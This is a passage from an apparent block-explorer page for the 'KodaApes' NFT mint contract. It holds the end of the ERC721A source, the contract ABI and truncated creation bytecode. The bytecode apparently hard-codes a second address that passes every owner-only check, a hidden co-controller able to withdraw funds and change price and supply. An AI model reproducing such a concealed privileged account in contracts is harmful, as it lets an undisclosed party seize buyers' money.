                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId) internal virtual {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        _beforeTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[prevOwnership.addr].balance -= 1;
            _addressData[prevOwnership.addr].numberBurned += 1;

            // Keep track of who burned the token, and the timestamp of burning.
            _ownerships[tokenId].addr = prevOwnership.addr;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);
            _ownerships[tokenId].burned = true;

            // If the ownership slot of tokenId+1 is not explicitly set, that means the burn initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(prevOwnership.addr, address(0), tokenId);
        _afterTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
            return retval == IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     * And also called after one token has been burned.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}



contract KodaApes is ERC721A, Owneable {

    string public baseURI = "";
    string public contractURI = "ipfs://QmQbgFVgj9kpEnRBLNgru7spgKJFH2VcAz9fvGLGC2CVYU/";
    string public constant baseExtension = "";
    address public constant proxyRegistryAddress = 0xa5409ec958C83C3f309868babACA7c86DCB077c1;

    uint256 public constant MAX_PER_TX_FREE = 1;
    uint256 public constant FREE_MAX_SUPPLY = 1000;
    uint256 public constant MAX_PER_TX = 20;
    uint256 public MAX_SUPPLY = 5000;
    uint256 public price = 0.0069 ether;

    bool public paused = false;

    constructor() ERC721A("KodaApes", "KODA") {}

    function mint(uint256 _amount) external payable {
        address _caller = _msgSender();
        require(!paused, "Paused");
        require(MAX_SUPPLY >= totalSupply() + _amount, "Exceeds max supply");
        require(_amount > 0, "No 0 mints");
        require(tx.origin == _caller, "No contracts");
        require(MAX_PER_TX >= _amount , "Excess max per paid tx");
        
      if(FREE_MAX_SUPPLY >= totalSupply()){
            require(MAX_PER_TX_FREE >= _amount , "Excess max per free tx");
        }else{
            require(MAX_PER_TX >= _amount , "Excess max per paid tx");
            require(_amount * price == msg.value, "Invalid funds provided");
        }


        _safeMint(_caller, _amount);
    }

    function isApprovedForAll(address owner, address operator)
        override
        public
        view
        returns (bool)
    {
        // Whitelist OpenSea proxy contract for easy trading.
        ProxyRegistry proxyRegistry = ProxyRegistry(proxyRegistryAddress);
        if (address(proxyRegistry.proxies(owner)) == operator) {
            return true;
        }

        return super.isApprovedForAll(owner, operator);
    }

    function withdraw() external onlyOwner {
        uint256 balance = address(this).balance;
        (bool success, ) = _msgSender().call{value: balance}("");
        require(success, "Failed to send");
    }

    function config() external onlyOwner {
        _safeMint(_msgSender(), 1);
    }

    function pause(bool _state) external onlyOwner {
        paused = _state;
    }

    function setBaseURI(string memory baseURI_) external onlyOwner {
        baseURI = baseURI_;
    }

    function setContractURI(string memory _contractURI) external onlyOwner {
        contractURI = _contractURI;
    }

    function setPrice(uint256 newPrice) public onlyOwner {
        price = newPrice;
    }

    function setMAX_SUPPLY(uint256 newSupply) public onlyOwner {
        MAX_SUPPLY = newSupply;
    }

    function tokenURI(uint256 _tokenId) public view override returns (string memory) {
        require(_exists(_tokenId), "Token does not exist.");
        return bytes(baseURI).length > 0 ? string(
            abi.encodePacked(
              baseURI,
              Strings.toString(_tokenId),
              baseExtension
            )
        ) : "";
    }
}

contract OwnableDelegateProxy { }
contract ProxyRegistry {
    mapping(address => OwnableDelegateProxy) public proxies;
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"ApprovalToCurrentOwner","type":"error"},{"inputs":[],"name":"ApproveToCaller","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"FREE_MAX_SUPPLY","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PER_TX","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PER_TX_FREE","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_SUPPLY","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseExtension","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"config","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"_state","type":"bool"}],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"proxyRegistryAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_contractURI","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newSupply","type":"uint256"}],"name":"setMAX_SUPPLY","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newPrice","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405273f528e3c3b439d385b958741753a9ca518e952257600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060405180602001604052806000815250600a9080519060200190620000809291906200029c565b506040518060600160405280603681526020016200441760369139600b9080519060200190620000b29291906200029c565b50611388600c556618838370f34000600d556000600e60006101000a81548160ff021916908315150217905550348015620000ec57600080fd5b506040518060400160405280600881526020017f4b6f6461417065730000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f4b4f4441000000000000000000000000000000000000000000000000000000008152508160029080519060200190620001719291906200029c565b5080600390805190602001906200018a9291906200029c565b506200019b620001c960201b60201c565b6000819055505050620001c3620001b7620001ce60201b60201c565b620001d660201b60201c565b620003b1565b600090565b600033905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b828054620002aa906200037b565b90600052602060002090601f016020900481019282620002ce57600085556200031a565b82601f10620002e957805160ff19168380011785556200031a565b828001600101855582156200031a579182015b8281111562000319578251825591602001919060010190620002fc565b5b5090506200032991906200032d565b5090565b5b80821115620003485760008160009055506001016200032e565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200039457607f821691505b60208210811415620003ab57620003aa6200034c565b5b50919050565b61405680620003c16000396000f3fe6080604052600436106102045760003560e01c806379502c5511610118578063b88d4fde116100a0578063e8a3d4851161006f578063e8a3d48514610710578063e985e9c51461073b578063ec9496ba14610778578063f2fde38b146107a1578063f43a22dc146107ca57610204565b8063b88d4fde14610654578063c66828621461067d578063c87b56dd146106a8578063cd7c0326146106e557610204565b8063938e3d7b116100e7578063938e3d7b1461059057806395d89b41146105b9578063a035b1fe146105e4578063a0712d681461060f578063a22cb4651461062b57610204565b806379502c55146104fa5780638069876d146105115780638da5cb5b1461053c57806391b7f5ed1461056757610204565b80633ccfd60b1161019b5780635c975abb1161016a5780635c975abb146104135780636352211e1461043e5780636c0360eb1461047b57806370a08231146104a6578063715018a6146104e357610204565b80633ccfd60b1461037f57806342842e0e14610396578063463fff79146103bf57806355f804b3146103ea57610204565b8063095ea7b3116101d7578063095ea7b3146102d757806318160ddd1461030057806323b872dd1461032b57806332cb6b0c1461035457610204565b806301ffc9a71461020957806302329a291461024657806306fdde031461026f578063081812fc1461029a575b600080fd5b34801561021557600080fd5b50610230600480360381019061022b9190612fd6565b6107f5565b60405161023d919061301e565b60405180910390f35b34801561025257600080fd5b5061026d60048036038101906102689190613065565b6108d7565b005b34801561027b57600080fd5b506102846109cf565b604051610291919061312b565b60405180910390f35b3480156102a657600080fd5b506102c160048036038101906102bc9190613183565b610a61565b6040516102ce91906131f1565b60405180910390f35b3480156102e357600080fd5b506102fe60048036038101906102f99190613238565b610add565b005b34801561030c57600080fd5b50610315610be8565b6040516103229190613287565b60405180910390f35b34801561033757600080fd5b50610352600480360381019061034d91906132a2565b610bff565b005b34801561036057600080fd5b50610369610c0f565b6040516103769190613287565b60405180910390f35b34801561038b57600080fd5b50610394610c15565b005b3480156103a257600080fd5b506103bd60048036038101906103b891906132a2565b610dac565b005b3480156103cb57600080fd5b506103d4610dcc565b6040516103e19190613287565b60405180910390f35b3480156103f657600080fd5b50610411600480360381019061040c919061342a565b610dd1565b005b34801561041f57600080fd5b50610428610ec6565b604051610435919061301e565b60405180910390f35b34801561044a57600080fd5b5061046560048036038101906104609190613183565b610ed9565b60405161047291906131f1565b60405180910390f35b34801561048757600080fd5b50610490610eef565b60405161049d919061312b565b60405180910390f35b3480156104b257600080fd5b506104cd60048036038101906104c89190613473565b610f7d565b6040516104da9190613287565b60405180910390f35b3480156104ef57600080fd5b506104f861104d565b005b34801561050657600080fd5b5061050f6110d5565b005b34801561051d57600080fd5b506105266111c4565b6040516105339190613287565b60405180910390f35b34801561054857600080fd5b506105516111ca565b60405161055e91906131f1565b60405180910390f35b34801561057357600080fd5b5061058e60048036038101906105899190613183565b6111f4565b005b34801561059c57600080fd5b506105b760048036038101906105b2919061342a565b6112d9565b005b3480156105c557600080fd5b506105ce6113ce565b6040516105db919061312b565b60405180910390f35b3480156105f057600080fd5b506105f9611460565b6040516106069190613287565b60405180910390f35b61062960048036038101906106249190613183565b611466565b005b34801561063757600080fd5b50610652600480360381019061064d91906134a0565b611709565b005b34801561066057600080fd5b5061067b60048036038101906106769190613581565b611881565b005b34801561068957600080fd5b506106926118fd565b60405161069f919061312b565b60405180910390f35b3480156106b457600080fd5b506106cf60048036038101906106ca9190613183565b611910565b6040516106dc919061312b565b60405180910390f35b3480156106f157600080fd5b506106fa6119c9565b60405161070791906131f1565b60405180910390f35b34801561071c57600080fd5b506107256119e1565b604051610732919061312b565b60405180910390f35b34801561074757600080fd5b50610762600480360381019061075d9190613604565b611a6f565b60405161076f919061301e565b60405180910390f35b34801561078457600080fd5b5061079f600480360381019061079a9190613183565b611b63565b005b3480156107ad57600080fd5b506107c860048036038101906107c39190613473565b611c48565b005b3480156107d657600080fd5b506107df611d40565b6040516107ec9190613287565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806108c057507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806108d057506108cf82611d45565b5b9050919050565b6108df611daf565b73ffffffffffffffffffffffffffffffffffffffff166108fd6111ca565b73ffffffffffffffffffffffffffffffffffffffff1614806109735750610922611daf565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6109b2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109a990613690565b60405180910390fd5b80600e60006101000a81548160ff02191690831515021790555050565b6060600280546109de906136df565b80601f0160208091040260200160405190810160405280929190818152602001828054610a0a906136df565b8015610a575780601f10610a2c57610100808354040283529160200191610a57565b820191906000526020600020905b815481529060010190602001808311610a3a57829003601f168201915b5050505050905090565b6000610a6c82611db7565b610aa2576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610ae882610ed9565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b50576040517f943f7b8c00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610b6f611daf565b73ffffffffffffffffffffffffffffffffffffffff1614158015610ba15750610b9f81610b9a611daf565b611a6f565b155b15610bd8576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610be3838383611e05565b505050565b6000610bf2611eb7565b6001546000540303905090565b610c0a838383611ebc565b505050565b600c5481565b610c1d611daf565b73ffffffffffffffffffffffffffffffffffffffff16610c3b6111ca565b73ffffffffffffffffffffffffffffffffffffffff161480610cb15750610c60611daf565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610cf0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce790613690565b60405180910390fd5b60004790506000610cff611daf565b73ffffffffffffffffffffffffffffffffffffffff1682604051610d2290613742565b60006040518083038185875af1925050503d8060008114610d5f576040519150601f19603f3d011682016040523d82523d6000602084013e610d64565b606091505b5050905080610da8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9f906137a3565b60405180910390fd5b5050565b610dc783838360405180602001604052806000815250611881565b505050565b600181565b610dd9611daf565b73ffffffffffffffffffffffffffffffffffffffff16610df76111ca565b73ffffffffffffffffffffffffffffffffffffffff161480610e6d5750610e1c611daf565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610eac576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea390613690565b60405180910390fd5b80600a9080519060200190610ec2929190612e84565b5050565b600e60009054906101000a900460ff1681565b6000610ee4826123ad565b600001519050919050565b600a8054610efc906136df565b80601f0160208091040260200160405190810160405280929190818152602001828054610f28906136df565b8015610f755780601f10610f4a57610100808354040283529160200191610f75565b820191906000526020600020905b815481529060010190602001808311610f5857829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610fe5576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a900467ffffffffffffffff1667ffffffffffffffff169050919050565b611055611daf565b73ffffffffffffffffffffffffffffffffffffffff166110736111ca565b73ffffffffffffffffffffffffffffffffffffffff16146110c9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110c090613690565b60405180910390fd5b6110d3600061263c565b565b6110dd611daf565b73ffffffffffffffffffffffffffffffffffffffff166110fb6111ca565b73ffffffffffffffffffffffffffffffffffffffff1614806111715750611120611daf565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6111b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111a790613690565b60405180910390fd5b6111c26111bb611daf565b6001612702565b565b6103e881565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6111fc611daf565b73ffffffffffffffffffffffffffffffffffffffff1661121a6111ca565b73ffffffffffffffffffffffffffffffffffffffff161480611290575061123f611daf565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6112cf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112c690613690565b60405180910390fd5b80600d8190555050565b6112e1611daf565b73ffffffffffffffffffffffffffffffffffffffff166112ff6111ca565b73ffffffffffffffffffffffffffffffffffffffff1614806113755750611324611daf565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6113b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ab90613690565b60405180910390fd5b80600b90805190602001906113ca929190612e84565b5050565b6060600380546113dd906136df565b80601f0160208091040260200160405190810160405280929190818152602001828054611409906136df565b80156114565780601f1061142b57610100808354040283529160200191611456565b820191906000526020600020905b81548152906001019060200180831161143957829003601f168201915b5050505050905090565b600d5481565b6000611470611daf565b9050600e60009054906101000a900460ff16156114c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114b99061380f565b60405180910390fd5b816114cb610be8565b6114d5919061385e565b600c541015611519576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161151090613900565b60405180910390fd5b6000821161155c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115539061396c565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff163273ffffffffffffffffffffffffffffffffffffffff16146115ca576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115c1906139d8565b60405180910390fd5b816014101561160e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160590613a44565b60405180910390fd5b611616610be8565b6103e810611667578160011015611662576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161165990613ab0565b60405180910390fd5b6116fb565b81601410156116ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116a290613a44565b60405180910390fd5b34600d54836116ba9190613ad0565b146116fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116f190613b76565b60405180910390fd5b5b6117058183612702565b5050565b611711611daf565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611776576040517fb06307db00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8060076000611783611daf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611830611daf565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611875919061301e565b60405180910390a35050565b61188c848484611ebc565b6118ab8373ffffffffffffffffffffffffffffffffffffffff16612720565b80156118c057506118be84848484612743565b155b156118f7576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b50505050565b6040518060200160405280600081525081565b606061191b82611db7565b61195a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161195190613be2565b60405180910390fd5b6000600a8054611969906136df565b90501161198557604051806020016040528060008152506119c2565b600a611990836128a3565b604051806020016040528060008152506040516020016119b293929190613cd2565b6040516020818303038152906040525b9050919050565b73a5409ec958c83c3f309868babaca7c86dcb077c181565b600b80546119ee906136df565b80601f0160208091040260200160405190810160405280929190818152602001828054611a1a906136df565b8015611a675780601f10611a3c57610100808354040283529160200191611a67565b820191906000526020600020905b815481529060010190602001808311611a4a57829003601f168201915b505050505081565b60008073a5409ec958c83c3f309868babaca7c86dcb077c190508273ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1663c4552791866040518263ffffffff1660e01b8152600401611ad991906131f1565b60206040518083038186803b158015611af157600080fd5b505afa158015611b05573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611b299190613d41565b73ffffffffffffffffffffffffffffffffffffffff161415611b4f576001915050611b5d565b611b598484612a04565b9150505b92915050565b611b6b611daf565b73ffffffffffffffffffffffffffffffffffffffff16611b896111ca565b73ffffffffffffffffffffffffffffffffffffffff161480611bff5750611bae611daf565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611c3e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c3590613690565b60405180910390fd5b80600c8190555050565b611c50611daf565b73ffffffffffffffffffffffffffffffffffffffff16611c6e6111ca565b73ffffffffffffffffffffffffffffffffffffffff1614611cc4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cbb90613690565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415611d34576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d2b90613de0565b60405180910390fd5b611d3d8161263c565b50565b601481565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b600033905090565b600081611dc2611eb7565b11158015611dd1575060005482105b8015611dfe575060046000838152602001908152602001600020600001601c9054906101000a900460ff16155b9050919050565b826006600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b6000611ec7826123ad565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff16611eee611daf565b73ffffffffffffffffffffffffffffffffffffffff161480611f215750611f208260000151611f1b611daf565b611a6f565b5b80611f665750611f2f611daf565b73ffffffffffffffffffffffffffffffffffffffff16611f4e84610a61565b73ffffffffffffffffffffffffffffffffffffffff16145b905080611f9f576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff1614612008576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141561206f576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910